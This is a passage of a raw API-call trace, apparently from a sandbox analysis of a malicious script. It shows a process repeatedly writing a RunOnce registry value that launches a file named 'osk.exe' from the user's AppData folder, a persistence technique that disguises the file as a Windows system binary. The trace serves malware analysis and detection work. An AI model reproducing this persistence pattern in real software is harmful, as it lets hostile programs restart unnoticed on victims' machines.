cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.407] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.408] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.408] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.408] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.408] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0081.408] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.408] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x35 [0081.408] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.409] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0081.409] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.409] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.409] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.409] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.409] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.409] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.409] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.409] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.409] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.410] RegCloseKey (hKey=0x280) returned 0x0 [0081.410] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.410] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.410] SetTimer (hWnd=0x20280, nIDEvent=0x20b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b0 [0081.410] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.422] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.422] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.422] KillTimer (hWnd=0x20280, uIDEvent=0x20b0) returned 1 [0081.422] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.422] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.423] IUnknown:Release (This=0x787518) returned 0x1 [0081.423] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.423] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.423] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.423] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.423] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0081.423] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.423] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x36 [0081.423] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.424] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0081.424] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.424] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.424] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.424] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.425] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.425] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.425] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.425] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.425] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.425] RegCloseKey (hKey=0x280) returned 0x0 [0081.425] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.425] SetTimer (hWnd=0x20280, nIDEvent=0x20b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b1 [0081.426] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.437] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.438] KillTimer (hWnd=0x20280, uIDEvent=0x20b1) returned 1 [0081.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.438] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.438] IUnknown:Release (This=0x787518) returned 0x1 [0081.438] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.438] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.438] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.439] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.439] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 [0081.439] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.439] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x37 [0081.439] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.440] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 [0081.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.440] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.440] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.440] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.441] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.441] RegCloseKey (hKey=0x280) returned 0x0 [0081.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.441] SetTimer (hWnd=0x20280, nIDEvent=0x20b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b2 [0081.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.453] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.453] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.453] KillTimer (hWnd=0x20280, uIDEvent=0x20b2) returned 1 [0081.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.454] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.454] IUnknown:Release (This=0x787518) returned 0x1 [0081.454] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.454] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.454] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, 